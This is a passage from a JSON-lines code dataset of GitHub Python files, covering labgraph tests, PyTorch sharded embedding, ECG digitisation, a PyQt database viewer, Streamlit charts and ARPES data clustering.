1.05)\r\n","repo_name":"jacopomartellotto/Lorenz_Attractor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17793709001","text":"import asyncio\nfrom typing import Any\n\nimport pytest\n\nfrom ...graphs import AsyncPublisher, Topic\nfrom ...graphs.method import get_method_metadata\nfrom ...messages import Message\nfrom .. 
import BaseEventGenerator, BaseEventGeneratorNode, EventPublishingHeap\n\n\npytest_plugins = [\"pytest_mock\"]\n\n\nclass MyMessage(Message):\n    my_field: str\n\n\nclass MyBaseEventGenerator(BaseEventGenerator):\n    def __init__(self) -> None:\n        self.heap = EventPublishingHeap()\n\n    def generate_events(self) -> EventPublishingHeap:\n        return self.heap\n\n    def set_topics(self) -> None:\n        pass\n\n\nclass MyBaseEventGeneratorNode(BaseEventGeneratorNode):\n\n    MY_TOPIC = Topic(MyMessage)\n\n    async def publish_events(self) -> AsyncPublisher:\n        return await super().publish_events()\n\n\n@pytest.fixture\ndef event_loop(): # type: ignore\n    loop = asyncio.new_event_loop()\n    asyncio.set_event_loop(loop)\n    yield loop\n    loop.close()\n\n\ndef test_base_event_generator_node_meta(mocker: Any) -> None:\n    node = MyBaseEventGeneratorNode()\n    publisher_metadata = get_method_metadata(node.publish_events)\n    topic = publisher_metadata.published_topics[0]\n    assert topic.name == node.MY_TOPIC.name\n    assert topic.message_type == node.MY_TOPIC.message_type\n\n\ndef test_base_event_generator_node_init(mocker: Any) -> None:\n    mock_time = mocker.patch(\n        \"labgraph.events.event_generator_node.time\"\n    )\n    mock_time.return_value = 0.0\n    node = MyBaseEventGeneratorNode()\n    assert node._start_time == 0.0\n\n\ndef test_base_event_generator_node_elapsed(mocker: Any) -> None:\n    mock_time = mocker.patch(\n        \"labgraph.events.event_generator_node.time\"\n    )\n    mock_time.side_effect = [0.0, 1.0]\n    node = MyBaseEventGeneratorNode()\n    assert node._time_elapsed_since_start() == 1.0\n\n\ndef test_base_event_generator_node_generator(mocker: Any) -> None:\n    generator = MyBaseEventGenerator()\n    node = MyBaseEventGeneratorNode()\n    node.setup_generator(generator)\n    assert node._generator == generator\n    assert node.generate_events() == generator.heap\n\n\ndef test_base_event_generator_node_publish(event_loop: Any, mocker: Any) -> None:\n    node = MyBaseEventGeneratorNode()\n    with pytest.raises(NotImplementedError):\n        _ = event_loop.run_until_complete(node.publish_events())\n","repo_name":"facebookresearch/labgraph","sub_path":"labgraph/events/tests/test_event_generator_node.py","file_name":"test_event_generator_node.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"72"} +{"seq_id":"41749170441","text":"countries = []\ncities = []\ncapital = []\ncities_letters = {}\nletter_count = []\n\ndef founder(_founders):\n    return _founders['Accession']\n\nwith open('eu.csv','r',encoding='utf-8') as source:\n\n    for line in source:\n        country_list=line.strip().split(',')\n        country = {'Country': country_list[0], 'Capital': country_list[1], 'Accession': country_list[2]}\n        countries.append(country)\n\ncountries.sort(key=founder)\n\nearliest = countries[0]['Accession']\nprint(countries)\nfor z in range(len(countries)):\n    if earliest > countries[z]['Accession']:\n        earliest = countries[z]['Accession']\n\nfounder_count = 0\nfor i in countries:\n    if i['Accession'] == earliest:\n        founder_count += 1\n\nfor x in countries:\n    cities.append(x['Capital'])\nfor y in cities:\n    if y[0]==\"B\":\n        capital.append(y)\n\nletters = []\nfor country in countries:\n    letters.append(len(country['Country']))\nletters.sort()\nfourth_shortest = letters[3] # length of the fourth-shortest country name\n\nprint(founder_count, 'founding members of the EU.')\nprint('Capitals starting with B: 
',capital)\nprint(fourth_shortest)\n\n\n\n\n","repo_name":"Arian1216/bolyai","sub_path":"om30.py","file_name":"om30.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1175983735","text":"from typing import Optional, Union\nfrom dataclasses import dataclass\nfrom enum import Enum\n\nimport numpy as np\n\nfrom ecgdigitize.image import ColorImage\nfrom . import common\nfrom .grid import detection as grid_detection\nfrom .grid import extraction as grid_extraction\nfrom .signal import detection as signal_detection\nfrom .signal.extraction import viterbi\nfrom . import vision\n\n\ndef estimateRotationAngle(image: ColorImage, houghThresholdFraction: float = 0.25) -> Optional[float]:\n binaryImage = grid_detection.thresholdApproach(image)\n\n houghThreshold = int(image.width * houghThresholdFraction)\n lines = vision.houghLines(binaryImage, houghThreshold)\n\n # <- DEBUG ->\n # from ecgdigitize import visualization\n # visualization.displayImage(visualization.overlayLines(lines, image))\n\n angles = common.mapList(lines, vision.houghLineToAngle)\n offsets = common.mapList(angles, lambda angle: angle % 90)\n candidates = common.filterList(offsets, lambda offset: abs(offset) < 30)\n\n if len(candidates) > 1:\n estimatedAngle = common.mean(candidates)\n return estimatedAngle\n else:\n return None\n\n\nclass SignalDetectionMethod(Enum):\n default = 'default'\n\n\nclass SignalExtractionMethod(Enum):\n default = 'default'\n\n\ndef digitizeSignal(\n image: ColorImage,\n detectionMethod: SignalDetectionMethod = SignalDetectionMethod.default,\n extractionMethod: SignalExtractionMethod = SignalExtractionMethod.default\n) -> Union[np.ndarray, common.Failure]:\n # First, convert color image to binary image where signal pixels are turned on (1) and other are off (0)\n if detectionMethod == SignalDetectionMethod.default:\n binary = signal_detection.adaptive(image)\n else:\n raise ValueError(\"Unrecognized SignalDetectionMethod in `digitizeSignal`\")\n\n # Second, analyze the binary image to produce a signal\n if extractionMethod == SignalExtractionMethod.default:\n signal = viterbi.extractSignal(binary)\n else:\n raise ValueError(\"Unrecognized SignalExtractionMethod in `digitizeSignal`\")\n\n return signal\n\n\nclass GridDetectionMethod(Enum):\n default = 'default'\n\n\nclass GridExtractionMethod(Enum):\n default = 'default'\n\n\ndef digitizeGrid(\n image: ColorImage,\n detectionMethod: GridDetectionMethod = GridDetectionMethod.default,\n extractionMethod: GridExtractionMethod = GridExtractionMethod.default\n) -> Union[float, common.Failure]: # Returns size of grid in pixels\n # First, convert color image to binary image where grid pixels are turned on (1) and all others are off (0)\n if detectionMethod == GridDetectionMethod.default:\n # Nothing intelligent; just gets all non-white pixels\n binary = grid_detection.allDarkPixels(image)\n else:\n raise ValueError(\"Unrecognized GridDetectionMethod in `digitizeGrid`\")\n\n # Second, analyze the binary image to estimate the grid spacing (period)\n if extractionMethod == GridExtractionMethod.default:\n gridPeriod = grid_extraction.estimateFrequencyViaAutocorrelation(binary.data)\n else:\n raise ValueError(\"Unrecognized GridExtractionMethod in `digitizeSignal`\")\n\n return 
gridPeriod\n\n","repo_name":"Tereshchenkolab/paper-ecg","sub_path":"src/main/python/ecgdigitize/ecgdigitize.py","file_name":"ecgdigitize.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"14831362729","text":"\nimport torch\nimport torch.distributed as dist\nfrom torch.distributed._shard.sharded_tensor import ShardedTensor\nfrom torch.distributed._shard.sharding_spec import ChunkShardingSpec\nfrom torch.distributed._shard.sharding_spec.api import custom_sharding_spec_op\nfrom torch.distributed.nn.functional import all_gather, reduce_scatter\n\nfrom ._common import (\n _all_gather_base_input,\n _handle_col_wise_sharding_base,\n _handle_max_norm_col_wise,\n _handle_row_wise_mask,\n)\n\n\n@custom_sharding_spec_op(ChunkShardingSpec, torch.nn.functional.embedding)\ndef sharded_embedding(types, args, kwargs, pg):\n \"\"\"\n Handles ``__torch_function__`` dispatch for ``torch.nn.functional.embedding``.\n This method computes a sharded embedding lookup and has the following limitations:\n\n 1. Supports only sharding of ``weight``.\n 2. Supports only ``ChunkShardingSpec``.\n 3. Supports only a single local shard per rank.\n 4. Supports all specs except for scale_grad_by_freq, sparse, etc.\n\n Based on the dimension that the weight is sharded on, there are two\n algorithms:\n\n ROWWISE SHARDING\n ================\n For row-wise sharding the weight is sharded on dimension 0.\n\n The overall algorithm can be best explained with an example. Let's assume\n the dims for input are (4 x 6) and W are (10 x 17) and W is sharded across\n 4 GPUs creating 3 shard of (3 x 17) and 1 shard of (1 x 17).\n The algorithm is as follows:\n\n 1. First the input is all gathered to all ranks, since this is SPMD and\n input is actually sharded across all ranks. The inputs then become a\n 4 (4 x 6) tensor on each rank. For example if the given input is\n tensor([[6, 5, 2, 9, 6, 3],\n [3, 1, 2, 4, 7, 6],\n [4, 0, 4, 9, 8, 9],\n [8, 6, 6, 4, 6, 1]])\n on rank 0.\n Then on every rank, we will have this tensor.\n If input itself is already replicated, no all-gather will be done.\n 2. Next, we mask the ID which are not stored on that rank.\n For example on rank 0, we store ID [0, 1, 2]. We only keep the ID\n inside the set of numbers. The rest of them will be masked to an extra row.\n The masked matrix will be used for embedding look up and is like:\n tensor([[4, 4, 2, 4, 4, 4],\n [4, 1, 2, 4, 4, 4],\n [4, 0, 4, 4, 4, 4],\n [4, 4, 4, 4, 4, 1]])\n The reason of having an extra row (aka, number 4 in the example) is\n because when max_norm is specified only weight which has looked will\n be re-normed so mask IDs whose embeddings are not stored in current\n rank will to an extra row will ensure max_norm still works as expected.\n 3. If max_norm is specified, the extra row guarantees that the mask ID will\n not affect the behavior of weigh re-norm.\n\n COLWISE SHARDING\n ================\n For col-wise sharding the weight is sharded on dimension 1.\n\n The overall algorithm can be best explained with an example. Let's assume\n the dims for input are (4 x 6) and W are (16 x 17) and W is sharded across\n 4 GPUs creating 3 shards of (16 x 5) and 1 shard of (16 x 2).\n The algorithm is as follows:\n\n 1. First the input is broadcasted to all ranks, since this is SPMD we\n actually do an all_gather for all the inputs resulting in 4 (4 x 6)\n inputs on each rank.\n 2. 
Next we perform local embedding lookup operation by apply each\n input (4 x 6) with the local shard (16 x 5) ((16 x 2) for the last).\n This results in 4 (5 x 6 x 4) ((2 x 6 x 4) for the last) matrices\n on each rank. We transpose dim 0 and dim 2.\n 3. Next, we concat these 4 matrices and perform an all2all to share the\n appropriate (5 x 6 x 4) or (2 x 6 x 4) matrices to each rank.\n 4. Now, each rank receives a (17 x 6 x 4) matrix which is basically the\n size of the result we need.\n 5. If placements are not in order any appropriate rearrangement of columns\n are done for the (17 x 6 x 4) matrix and finally we transpose the\n dim 0 and dim 2 again.\n 6. If max_norm is specified, we manually sum up the norm and renorm. Because\n the renorm must be in place, we need to override the local_shard to mimic\n this behavior.\n \"\"\"\n # Validate input params\n _validate_embedding_param(args, kwargs)\n\n input = args[0]\n weight = args[1]\n max_norm = kwargs.get(\"max_norm\")\n norm_type = kwargs.get(\"norm_type\")\n padding_idx = kwargs.get(\"padding_idx\")\n\n local_shard = weight.local_tensor().contiguous()\n sharding_dim = weight._sharding_spec.dim\n world_size = dist.get_world_size(pg)\n rank = dist.get_rank(pg)\n\n if sharding_dim == 1:\n output, local_shard = _handle_col_wise_sharding(\n input, world_size, weight, local_shard, max_norm, norm_type, padding_idx, pg\n )\n weight.local_shards()[0].tensor = local_shard\n return output\n elif sharding_dim == 0:\n return _handle_row_wise_sharding(\n input,\n world_size,\n weight,\n local_shard,\n max_norm,\n norm_type,\n padding_idx,\n rank,\n pg,\n )\n else:\n raise RuntimeError(\n f\"nn.Embedding weight sharded on dim {sharding_dim} not supported!\"\n )\n\n\ndef _validate_embedding_param(args, kwargs):\n \"\"\"\n Validate input params of sharded embedding op.\n\n Args:\n input: list of ID used for lookup.\n weight: sharded weight tensor.\n kwargs: same as normal Embedding.\n\n Return: None.\n \"\"\"\n\n input = args[0]\n weight = args[1]\n max_norm = kwargs.get(\"max_norm\")\n scale_grad_by_freq = kwargs.get(\"scale_grad_by_freq\")\n sparse = kwargs.get(\"sparse\")\n\n # Validate types\n if not isinstance(input, torch.Tensor):\n raise TypeError(\"input need to be torch.Tensor\")\n if not isinstance(weight, ShardedTensor):\n raise TypeError(\"weight needs to be ShardedTensor\")\n weight_size = weight.size()\n if len(weight_size) != 2:\n raise ValueError(\"Weight needs to have exactly 2 dims\")\n if int(torch.min(input).item()) < 0:\n raise ValueError(\n \"Index out of range in Input %d %d\",\n int(torch.min(input).item()),\n weight_size[1],\n )\n if int(torch.max(input).item()) >= weight_size[0]:\n raise ValueError(\n \"Index out of range in Input %d %d\",\n int(torch.max(input).item()),\n weight_size[1],\n )\n if scale_grad_by_freq:\n raise RuntimeError(\n 'nn.Embedding weight sharded with flag on \"scale_grad_by_freq\" not supported!'\n )\n if sparse:\n raise RuntimeError(\n 'nn.Embedding weight sharded with flag on \"sparse\" not supported!'\n )\n if max_norm and max_norm <= 0.0:\n raise ValueError('\"max_norm\" must be larger than zero!')\n\n if not isinstance(weight._sharding_spec, ChunkShardingSpec):\n raise ValueError(\"Only ChunkShardingSpec supported for ShardedTensor ops!\")\n if len(weight.local_shards()) != 1:\n raise ValueError(\"Only one local shard supported!\")\n\n\ndef _handle_col_wise_sharding(\n input, world_size, weight, local_shard, max_norm, norm_type, padding_idx, pg\n):\n \"\"\"\n Entry-point function to handle the 
logic of col-wise sharding of weight\n for embedding. (Detailed explanations of the logic can be found in\n the comment for sharded_embedding.)\n\n Args:\n input: list of ID used for lookup and aggregation.\n world_size: number of ranks.\n weight: sharded weight tensor.\n local_shard: col-wise shared local weight used for lookup.\n max_norm: If given, each embedding vector with norm larger\n than max_norm is renormalized to have norm max_norm.\n Note: this will modify weight in-place.\n norm_type: The p in the p-norm to compute for the max_norm option.\n padding_idx: If specified, the entries at padding_idx do\n not contribute to the gradient; therefore, the embedding\n vector at padding_idx is not updated during training,\n i.e. it remains as a fixed “pad”.\n pg: process group.\n\n Returns: final result of lookup.\n \"\"\"\n # allgather the inputs first for non Replicated Tensor.\n gathered_inputs = all_gather(input, group=pg)\n\n if max_norm is not None:\n # max_norm changes the weight in-place\n local_shard = _handle_max_norm_col_wise(\n max_norm, norm_type, local_shard, input, world_size, gathered_inputs, pg\n )\n\n output = _handle_col_wise_sharding_base(\n torch.nn.functional.embedding,\n len(input.size()),\n input,\n world_size,\n weight,\n local_shard,\n pg,\n gathered_inputs,\n padding_idx=padding_idx,\n )\n return (output, local_shard)\n\n\ndef _handle_row_wise_sharding(\n input, world_size, weight, local_shard, max_norm, norm_type, padding_idx, rank, pg\n):\n \"\"\"\n Entry-point function to handle the logic of row-wise sharding of weight\n for embedding. (Detailed explanations of the logic can be found in\n the comment for sharded_embedding.)\n\n Args:\n input: list of ID used for lookup and aggregation.\n world_size: number of ranks.\n weight: sharded weight tensor.\n local_shard: row-wise shared local weight used for lookup.\n max_norm: If given, each embedding vector with norm larger\n than max_norm is renormalized to have norm max_norm.\n Note: this will modify weight in-place.\n norm_type: The p in the p-norm to compute for the max_norm option.\n padding_idx: If specified, the entries at padding_idx do\n not contribute to the gradient; therefore, the embedding\n vector at padding_idx is not updated during training,\n i.e. it remains as a fixed “pad”.\n rank: # of cuda process.\n pg: process group.\n\n Returns: final result of lookup.\n \"\"\"\n # allgather the inputs first for non Replicated Tensor.\n gather_inp = _all_gather_base_input(input, pg)\n\n # Mask the input according to sharding spec.\n lookup_input, padding_idx, padding_row = _handle_row_wise_mask(\n gather_inp, padding_idx, weight, world_size, rank\n )\n\n # When input is a large tensor, the value of weight is changed.\n # This is a walk-around for now. 
GH issue: #81717\n    if max_norm is not None:\n        torch.nn.functional.embedding(\n            torch.unique(lookup_input)[:-1],\n            local_shard,\n            padding_idx=padding_idx,\n            max_norm=max_norm,\n            norm_type=norm_type,\n        )\n        max_norm = None\n\n    local_input_embeddings = torch.nn.functional.embedding(\n        lookup_input,\n        torch.cat([local_shard, padding_row]),\n        padding_idx=padding_idx,\n        max_norm=max_norm,\n        norm_type=norm_type,\n    )\n\n    # TODO: Make the result a PartialTensor.\n    local_shards = local_input_embeddings.chunk(pg.size())\n    return reduce_scatter(\n        torch.empty_like(local_shards[0]),\n        list(local_shards),\n        group=pg,\n    )\n","repo_name":"pytorch/pytorch","sub_path":"torch/distributed/_shard/sharding_spec/chunk_sharding_spec_ops/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":11190,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"25706513375","text":"import sys, time, os\n\ntop = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '..', '..'))\nsys.path.append(os.path.join(top, 'src', 'python'))\nimport solar_capture as sc\n\n\nargs = sys.argv[1:]\nassert len(args) == 1\nn_workers = int(args[0])\n\nthrd_attr = dict(busy_wait=0)\n\nscs = sc.new_session()\nthrd = scs.new_thread(attr=thrd_attr)\n\nsrc = thrd.new_node('sc_pool_forwarder')\nsrc = src.connect(thrd.new_node('sct_seq32', args=dict(offset=0)))\nsrc = src.connect(thrd.new_node('sc_rr_spreader'))\n\nsink = thrd.new_node('sc_rr_gather')\nsink.connect(thrd.new_node('sct_seq32_check', args=dict(offset=0)))\n\nfor i in range(n_workers):\n    wthrd = scs.new_thread(attr=thrd_attr)\n    worker = wthrd.new_node('sc_sim_work', args=dict(per_packet_ns=1000000))\n    sc.connect(src, worker)\n    sc.connect(worker, sink)\n\nscs.go()\nwhile True:\n    time.sleep(10000)\n","repo_name":"Xilinx-CNS/solarcapture","sub_path":"src/test/rr_spread.py","file_name":"rr_spread.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"43686002722","text":"# Import the required libraries\nimport streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\n\n# Create a function to display a chart with a filter\ndef show_grouped_data(group_by, data_type, group_by_option, data_type_option, month, filtered_df):\n    days_order = ['Lundi', 'Mardi', 'Mercredi', 'Jeudi', 'Vendredi', 'Samedi', 'Dimanche']\n\n    df_grouped = filtered_df.copy()\n    if group_by == 'Jour':\n        df_grouped['Jour'] = pd.Categorical(df_grouped['Jour'], categories=days_order, ordered=True)\n        grouped = df_grouped.groupby('Jour')[data_type].sum().reset_index()\n\n    elif group_by == 'Mois et Jour' and month:\n        df_grouped['mois'] = df_grouped['Date'].dt.to_period(\"M\")\n        df_grouped['Jour'] = pd.Categorical(df_grouped['Jour'], categories=days_order, ordered=True)\n        grouped = df_grouped[df_grouped['mois'].dt.strftime('%m/%Y') == month].groupby(['mois', 'Jour'])[data_type].sum().reset_index()\n\n    # Build a bar chart with Plotly\n    fig = go.Figure()\n    fig.add_trace(go.Bar(\n        x=grouped['Jour'],\n        y=grouped[data_type],\n        name=data_type_option\n    ))\n    fig.update_layout(\n        title=f\"Répartition par {group_by_option} : {data_type_option}\",\n        xaxis_title=group_by,\n        yaxis_title=data_type,\n        xaxis_tickangle=-45\n    )\n    
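# Render the assembled Plotly figure inside the Streamlit app.\n    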
st.plotly_chart(fig)\n","repo_name":"Frecel59/catering_service","sub_path":"Analyses/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4483785274","text":"import joblib\nimport numpy as np\n\n# Load the trained model from the file\nlog_reg = joblib.load(\"C:/Users/pc/PycharmProjects/pythonProject1/trained_model.pkl\")\n\narr = np.array([60, 1, 4.08, 38.8, 95, 30.8, 32.4, 15.2, 7.1, 183, 12.6])\nreshaped_arr = arr.reshape(1, -1)\n\n# Load the scaler used for training\n# the path for the scaler used to scale the training data so we use it to scale the input\nscaler = joblib.load(\"C:/Users/pc/PycharmProjects/pythonProject1/scaler.pkl\")\narr_scaled = scaler.transform(reshaped_arr)\n\nprint(log_reg.predict(arr_scaled))\n","repo_name":"AdemBendjama/Brave-Lab","sub_path":"IA_modeles/model-anemia/pythonProject1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42317513636","text":"from PyQt6 import QtCore, QtGui, QtWidgets\r\nfrom PyQt6.QtGui import QIcon\r\nfrom database import Database \r\n\r\nclass Ui_Form(object):\r\n def setupUi(self, Form):\r\n Form.setObjectName(\"Form\")\r\n Form.resize(603, 576)\r\n Form.setWindowIcon(QIcon('logo.png'))\r\n self.verticalLayout = QtWidgets.QVBoxLayout(Form)\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.frame = QtWidgets.QFrame(Form)\r\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.frame.setObjectName(\"frame\")\r\n self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)\r\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\r\n self.scrollArea = QtWidgets.QScrollArea(self.frame)\r\n self.scrollArea.setWidgetResizable(True)\r\n self.scrollArea.setObjectName(\"scrollArea\")\r\n self.scrollAreaWidgetContents = QtWidgets.QWidget()\r\n self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 563, 487))\r\n self.scrollAreaWidgetContents.setObjectName(\"scrollAreaWidgetContents\")\r\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)\r\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\r\n self.verticalLayout_4 = QtWidgets.QVBoxLayout()\r\n self.verticalLayout_4.setObjectName(\"verticalLayout_4\")\r\n self.verticalLayout_3.addLayout(self.verticalLayout_4)\r\n self.scrollArea.setWidget(self.scrollAreaWidgetContents)\r\n self.verticalLayout_2.addWidget(self.scrollArea)\r\n self.verticalLayout.addWidget(self.frame)\r\n self.frame_2 = QtWidgets.QFrame(Form)\r\n self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.frame_2.setObjectName(\"frame_2\")\r\n self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame_2)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.pushButton_2 = QtWidgets.QPushButton(self.frame_2)\r\n self.pushButton_2.setObjectName(\"pushButton_2\")\r\n self.horizontalLayout.addWidget(self.pushButton_2)\r\n self.verticalLayout.addWidget(self.frame_2)\r\n self.save_btn = QtWidgets.QPushButton(self.frame_2)\r\n self.save_btn.setText(\"Сохранить\")\r\n self.horizontalLayout.addWidget(self.save_btn)\r\n self.save_btn.clicked.connect(self.save_data)\r\n\r\n self.out_data()\r\n self.pushButton_2.clicked.connect(Form.close)\r\n\r\n self.retranslateUi(Form)\r\n 
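# auto-connect signals to slots named on_<objectName>_<signalName> (standard generated-UI call)\r\n        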
QtCore.QMetaObject.connectSlotsByName(Form)\r\n \r\n \r\n def out_data(self):\r\n db = Database()\r\n data = db.get_data(status=\"un_checked\")\r\n if len(data) > 0:\r\n for i in range(len(data)):\r\n label = QtWidgets.QLabel(f\"{data[i][0]}\")\r\n label.setMinimumSize(QtCore.QSize(100, 30))\r\n label.setMaximumSize(QtCore.QSize(100, 30))\r\n label.setStyleSheet(\"font-size: 12pt;\")\r\n if data[i][1] == \"ТС эксплуатируется инвалидом или используется для перевозки инвалида\":\r\n label_2 = QtWidgets.QLabel()\r\n label_2.setPixmap(QtGui.QPixmap(':/s/accept.png'))\r\n label_2.setScaledContents(True)\r\n label_2.setMinimumSize(QtCore.QSize(30, 30))\r\n label_2.setMaximumSize(QtCore.QSize(30, 30))\r\n else:\r\n label_2 = QtWidgets.QLabel()\r\n label_2.setPixmap(QtGui.QPixmap(':/s/cross.png'))\r\n label_2.setScaledContents(True)\r\n label_2.setMinimumSize(QtCore.QSize(30, 30))\r\n label_2.setMaximumSize(QtCore.QSize(30, 30))\r\n hor_layout = QtWidgets.QHBoxLayout()\r\n hor_layout.addWidget(label)\r\n hor_layout.addWidget(label_2)\r\n line = QtWidgets.QLineEdit()\r\n line.setMinimumSize(QtCore.QSize(200, 20))\r\n line.setMaximumSize(QtCore.QSize(200, 20))\r\n line.setPlaceholderText(\"Комментарий\")\r\n if data[i][2] != \"\" and data[i][2] is not None:\r\n line.setText(str(data[i][2]))\r\n line.setAlignment(QtCore.Qt.AlignCenter)\r\n hor_layout.addWidget(line)\r\n self.verticalLayout_4.addLayout(hor_layout)\r\n \r\n \r\n def save_data(self):\r\n db = Database()\r\n lines = self.scrollArea.findChildren(QtWidgets.QLineEdit)\r\n nums = self.scrollArea.findChildren(QtWidgets.QLabel)\r\n nums = [i.text().strip() for i in nums]\r\n nums = [i for i in nums if i != \"\"]\r\n for i in range(len(nums)):\r\n db.insert_comment(number=str(nums[i]), comment=str(lines[i].text()))\r\n \r\n \r\n def retranslateUi(self, Form):\r\n _translate = QtCore.QCoreApplication.translate\r\n Form.setWindowTitle(_translate(\"Form\", \"Просмотр базы данных\"))\r\n self.pushButton_2.setText(_translate(\"Form\", \"Закрыть\"))\r\nimport res\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n Form = QtWidgets.QWidget()\r\n ui = Ui_Form()\r\n ui.setupUi(Form)\r\n Form.show()\r\n sys.exit(app.exec_())\r\n\r\n","repo_name":"zerostar019/disabled_persons_car_checker","sub_path":"out_table.py","file_name":"out_table.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25931634192","text":"from numpy.core.numeric import count_nonzero\nimport numpy as np\nimport h5py\nimport os\nfrom math import log, sqrt\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Patch\nfrom matplotlib import colors, cm, offsetbox\nfrom mpl_toolkits.mplot3d import Axes3D, proj3d\nfrom mpl_toolkits.axes_grid1 import ImageGrid\nimport time\nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import pairwise_distances_argmin_min\nfrom yellowbrick.cluster import KElbowVisualizer, SilhouetteVisualizer\nfrom itertools import permutations\nimport numba\nimport random\nimport cv2\n\nfrom deeparpes.autoencoder.data_generator import *\nfrom deeparpes.autoencoder.noise_generator import *\n\n@numba.jit(nopython=True)\ndef sum_all(x_s, y_s, data):\n clean = np.zeros((x_s, y_s))\n for x in range(x_s):\n for y in range(y_s):\n clean[x,y] = np.sum(data[x,y])\n return clean\n\ndef img_is_color(img):\n if len(img.shape) == 
3:\n c1, c2, c3 = img[:, : , 0], img[:, :, 1], img[:, :, 2]\n if (c1 == c2).all() and (c2 == c3).all():\n return True\n return False\n\n\ndef show_image_list(list_images, list_titles=None, list_cmaps=None, grid=False, num_cols=3, figsize=(15, 9), title_fontsize=20):\n assert isinstance(list_images, list)\n assert len(list_images) > 0\n assert isinstance(list_images[0], np.ndarray)\n\n if list_titles is not None:\n assert isinstance(list_titles, list)\n assert len(list_images) == len(list_titles), '%d imgs != %d titles' % (len(list_images), len(list_titles))\n\n if list_cmaps is not None:\n assert isinstance(list_cmaps, list)\n assert len(list_images) == len(list_cmaps), '%d imgs != %d cmaps' % (len(list_images), len(list_cmaps))\n\n num_images = len(list_images)\n num_cols = min(num_images, num_cols)\n num_rows = int(num_images / num_cols) + (1 if num_images % num_cols != 0 else 0)\n\n # Create a grid of subplots.\n fig, axes = plt.subplots(num_rows, num_cols, figsize=figsize)\n \n # Create list of axes for easy iteration.\n if isinstance(axes, np.ndarray):\n list_axes = list(axes.flat)\n else:\n list_axes = [axes]\n\n for i in range(num_images):\n img = list_images[i]\n title = list_titles[i] if list_titles is not None else 'Image %d' % (i)\n cmap = list_cmaps[i] if list_cmaps is not None else (None if img_is_color(img) else 'gray')\n list_axes[i].imshow(img, cmap=cmap)\n list_axes[i].set_title(title, fontsize=title_fontsize) \n list_axes[i].grid(grid)\n list_axes[i].axis(\"off\")\n\n for i in range(num_images, len(list_axes)):\n list_axes[i].set_visible(False)\n\n fig.tight_layout()\n _ = plt.show()\n\n\n\n\n# creats a class of obejcts after applying K-means/PCA\nclass Clustered:\n def __init__(self, ARPES, fitted_model, raw_cords, dtype, percents): # ARPES is the ARPES_data object passed through\n self.ARPES = ARPES\n self.model = fitted_model\n self.labels = fitted_model.labels_\n self.centers = fitted_model.cluster_centers_\n self.cords = raw_cords\n self.dtype = dtype\n self.percents = percents\n\n def show(self, smooth = False, sampling = 1000, n_neighbors = 5):\n if smooth:\n values = self.ARPES.knn(self.labels, sampling, n_neighbors) \n else:\n values = np.reshape(self.labels, (self.ARPES.x_s, self.ARPES.y_s)).T\n ARPES_data.plot_graph(values,'X (mm)', 'Y (mm)', \\\n [self.ARPES.xmin, self.ARPES.xmax, self.ARPES.ymin, self.ARPES.ymax], interpolation= \"none\", \\\n cmap = 'YlOrRd', title = f'K-means clustering for {self.dtype}', \\\n pad = 15, cbar = False)\n\n\n def show_centers(self, encode = False, enhance = False):\n print(\"Finding representative points...\")\n closest, _ = pairwise_distances_argmin_min(self.centers, self.cords)\n print(\"Plotting...\")\n num_centers = len(self.centers)\n rows, cols = num_centers//3+1, 3\n fig = plt.figure(figsize=(10, 6))\n points = [(i%self.ARPES.x_s, i//self.ARPES.x_s) for i in closest]\n if encode:\n values = [cv2.resize(ARPES_data.get_decoding(self.ARPES.data[p[0], p[1]], enhance), (256,256)) for p in points]\n else:\n values = [cv2.resize(self.ARPES.data[p[0], p[1]], (256,256)) for p in points]\n titles = [f\"Cluster {c}\" for c in range(len(values))]\n show_image_list(values, titles, [\"magma\"]*len(titles))\n\n\n def show_double_cluster(self, cluster, enhance = False, line = True, epsilon = 0.4):\n points = []\n for n in range(len(self.labels)):\n if self.labels[n] == cluster:\n points.append([n%self.ARPES.x_s, n//self.ARPES.x_s])\n \n points = random.sample(points, 5)\n fig = plt.figure(figsize=(6, 10))\n fig.suptitle(f'Cluster 
